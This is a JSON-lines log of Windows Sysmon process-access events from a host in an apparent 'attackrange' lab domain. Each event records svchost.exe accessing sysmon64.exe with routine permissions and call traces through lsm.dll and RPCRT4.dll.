{"EventTime":"2020-08-01 06:00:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8183,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:55.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:55.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8184,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:55.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:55.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8185,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:55.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:55.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8186,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:55.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:55.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8187,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:55.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:55.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8188,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:55.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:55.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8189,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:55.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:55.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8190,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:55.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:55.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
